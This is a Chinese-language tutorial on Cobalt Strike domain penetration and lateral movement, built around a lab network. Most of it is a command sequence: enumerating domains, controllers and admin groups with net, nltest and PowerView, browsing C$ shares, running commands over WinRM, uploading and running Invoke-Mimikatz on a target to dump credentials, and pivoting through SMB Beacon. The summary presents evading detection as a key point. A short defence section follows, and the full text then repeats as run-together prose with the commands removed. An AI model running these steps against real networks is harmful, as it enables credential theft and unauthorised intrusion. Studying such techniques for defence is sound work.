CobaltStrike域内渗透与横向扩展实战指南

1. 网络拓扑与环境准备

1.1 网络拓扑分析

网络结构：
- 攻击者与Win7客户机在同一网段(192.x.x.x)
- Win7客户机、Win Server2008-2(成员服务器)、Win Server2008-1(域控制器)在同一内网(10.x.x.x)且同属一个域
安全区域划分：
- 外网(Internet)：安全级别最低
- DMZ区：非安全系统与安全系统间的缓冲区，放置Web/FTP等公开服务器
- 内网：
  - 办公区：员工日常工作区，安装防病毒软件等
  - 核心区：存储企业最重要数据，安全措施严密

1.2 环境搭建

配置Win7客户机：
- 安装双网卡(第二个设置为Lan区段10.0.0.1)
- 配置网卡2的IP和DNS服务器
- 加入域(需先在域控主机添加用户)
配置Win Server2008-2：
- 将普通域用户添加至该服务器的管理员组
- 开启WinRM服务：
```
winrm quickconfig
```

2. 主机枚举技术

2.1 Windows内置命令

查看当前用户：
```
shell whoami
shell net user
```
枚举当前域：
```
shell net view /domain
```

枚举域内主机：

shell net view /domain:域名
shell net group "domain computers" /domain

获取主机IP：

shell ping 主机名
shell nslookup 主机名

查看域控：
```
shell nltest /dclist:域名
```
查看信任关系：
```
shell nltest /domain_trusts
```
列出共享列表：
```
shell net view \\主机名
```

2.2 PowerView工具

导入PowerView：

powershell-import /path/to/PowerView.ps1

常用命令：

查询域信息：
```
powershell Get-NetDomain
```
查找网络共享：
```
powershell Invoke-ShareFinder
```
查看域信任关系：
```
powershell Invoke-MapDomainTrust
```

2.3 CobaltStrike Net模块

列出域控制器：
```
net dclist
net dclist 域名
```
列出共享：
```
net share \\主机名
```
查看域内主机：
```
net view
net view 域名
```

3. 用户枚举技术

3.1 判断当前账号权限

测试管理员权限：

shell dir \\主机名\C$
shell at \\主机名

使用PowerView：
```
powershell Find-LocalAdminAccess
```

3.2 枚举域管理员账号

Windows命令：

shell net group "enterprise admins" /DOMAIN
shell net group "domain admins" /DOMAIN
shell net localgroup "administrators" /domain

Net模块：

net group \\目标 组名
net localgroup \\目标 组名

PowerView：

powershell Get-NetLocalGroup -HostName 目标

4. 横向移动技术

4.1 文件操作

查看共享文件：
```
shell dir \\主机名\C$\目录
```

复制文件：

shell copy \\主机名\C$\路径\文件 本地路径

递归查看文件：
```
shell dir /S /B \\主机名\C$
```

4.2 WinRM远程执行

基本命令执行：

powershell Invoke-Command -ComputerName 目标 -ScriptBlock {命令}

执行Mimikatz：

上传Invoke-Mimikatz.ps1：
```
upload /path/to/Invoke-Mimikatz.ps1
```

导入并执行：

powershell import-module C:\Invoke-Mimikatz.ps1 ; Invoke-Mimikatz -ComputerName 目标

4.3 SMB Beacon

特点：
- 专为内网横向扩展设计
- 通过命名管道通信，减少网络流量
- 派生会话更隐蔽
使用方法：
- 在已有Beacon会话中使用spawn派生SMB Beacon
- 通过link命令连接SMB Beacon

5. 防御建议

权限管理：
- 避免将普通域用户添加到其他主机的本地管理员组
- 实施最小权限原则
服务配置：
- 严格控制WinRM服务使用
- 监控5985端口活动
监控措施：
- 监控异常的网络共享访问
- 检测异常的PowerShell活动
- 关注域内异常的用户枚举行为
日志审计：
- 启用详细的Windows事件日志
- 集中收集和分析安全日志
网络分段：
- 严格实施DMZ与内网隔离策略
- 限制跨区域通信

6. 总结

本指南详细介绍了使用CobaltStrike进行域内渗透和横向扩展的全过程，从初始的信息收集到权限提升和横向移动。关键点包括：

通过多种方式全面枚举域内信息
利用现有权限进行有效的横向移动
使用SMB Beacon等隐蔽技术保持持久访问
结合PowerShell工具规避安全检测

实际渗透中，攻击者往往会组合使用这些技术，因此防御方也需要建立多层次的防护体系来应对这类攻击。

CobaltStrike域内渗透与横向扩展实战指南 1. 网络拓扑与环境准备 1.1 网络拓扑分析网络结构：攻击者与Win7客户机在同一网段(192.x.x.x) Win7客户机、Win Server2008-2(成员服务器)、Win Server2008-1(域控制器)在同一内网(10.x.x.x)且同属一个域安全区域划分：外网(Internet) ：安全级别最低 DMZ区：非安全系统与安全系统间的缓冲区，放置Web/FTP等公开服务器内网：办公区：员工日常工作区，安装防病毒软件等核心区：存储企业最重要数据，安全措施严密 1.2 环境搭建配置Win7客户机：安装双网卡(第二个设置为Lan区段10.0.0.1) 配置网卡2的IP和DNS服务器加入域(需先在域控主机添加用户) 配置Win Server2008-2 ：将普通域用户添加至该服务器的管理员组开启WinRM服务： 2. 主机枚举技术 2.1 Windows内置命令查看当前用户：枚举当前域：枚举域内主机：获取主机IP ：查看域控：查看信任关系：列出共享列表： 2.2 PowerView工具导入PowerView ：常用命令：查询域信息：查找网络共享：查看域信任关系： 2.3 CobaltStrike Net模块列出域控制器：列出共享：查看域内主机： 3. 用户枚举技术 3.1 判断当前账号权限测试管理员权限：使用PowerView ： 3.2 枚举域管理员账号 Windows命令： Net模块： PowerView ： 4. 横向移动技术 4.1 文件操作查看共享文件：复制文件：递归查看文件： 4.2 WinRM远程执行基本命令执行：执行Mimikatz ：上传Invoke-Mimikatz.ps1：导入并执行： 4.3 SMB Beacon 特点：专为内网横向扩展设计通过命名管道通信，减少网络流量派生会话更隐蔽使用方法：在已有Beacon会话中使用 spawn 派生SMB Beacon 通过 link 命令连接SMB Beacon 5. 防御建议权限管理：避免将普通域用户添加到其他主机的本地管理员组实施最小权限原则服务配置：严格控制WinRM服务使用监控5985端口活动监控措施：监控异常的网络共享访问检测异常的PowerShell活动关注域内异常的用户枚举行为日志审计：启用详细的Windows事件日志集中收集和分析安全日志网络分段：严格实施DMZ与内网隔离策略限制跨区域通信 6. 总结本指南详细介绍了使用CobaltStrike进行域内渗透和横向扩展的全过程，从初始的信息收集到权限提升和横向移动。关键点包括：通过多种方式全面枚举域内信息利用现有权限进行有效的横向移动使用SMB Beacon等隐蔽技术保持持久访问结合PowerShell工具规避安全检测实际渗透中，攻击者往往会组合使用这些技术，因此防御方也需要建立多层次的防护体系来应对这类攻击。